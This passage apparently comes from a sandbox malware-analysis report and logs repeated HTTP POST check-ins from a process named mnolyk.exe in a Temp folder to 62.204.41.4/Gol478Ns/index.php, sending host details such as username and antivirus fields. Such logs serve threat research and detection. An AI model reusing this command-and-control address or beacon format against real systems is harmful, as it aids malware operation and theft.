                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      211192.168.2.74993862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:57.008660078 CET664OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:57.075479031 CET664INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:57 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      212192.168.2.74993962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:57.241621017 CET665OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:57.304322958 CET665INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:57 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      213192.168.2.74994062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:57.476531029 CET666OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:57.538958073 CET666INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:57 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      214192.168.2.74994162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:57.711370945 CET667OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:57.775655031 CET667INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:57 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      215192.168.2.74994262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:57.946568966 CET668OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:58.011249065 CET668INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:57 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      216192.168.2.74994362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:58.182255983 CET669OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:58.248070955 CET669INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:58 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      217192.168.2.74994462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:58.418493032 CET670OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:58.481282949 CET670INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:58 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      218192.168.2.74994562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:58.654499054 CET671OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:58.719652891 CET671INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:58 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      219192.168.2.74994662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:58.902146101 CET672OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:58.966620922 CET672INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:58 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      22192.168.2.74974662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:02.941803932 CET454OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:03.006386995 CET454INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      220192.168.2.74994762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:59.148433924 CET673OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:59.213347912 CET673INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:59 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      221192.168.2.74994862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:59.384504080 CET674OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:59.448514938 CET674INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:59 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      222192.168.2.74994962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:59.621007919 CET675OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:59.684891939 CET675INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:59 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      223192.168.2.74995062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:59.857429028 CET676OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:59.920886040 CET676INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:59 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      224192.168.2.74995162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:00.088634014 CET677OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:00.157044888 CET677INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:00 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      225192.168.2.74995262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:00.344242096 CET678OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:00.406126022 CET678INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:00 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      226192.168.2.74995362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:00.586144924 CET679OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:00.650333881 CET679INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:00 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      227192.168.2.74995462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:00.821017027 CET680OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:00.883276939 CET680INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:00 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      228192.168.2.74995562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:01.055368900 CET681OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:01.122129917 CET681INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:01 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      229192.168.2.74995662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:01.309389114 CET682OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
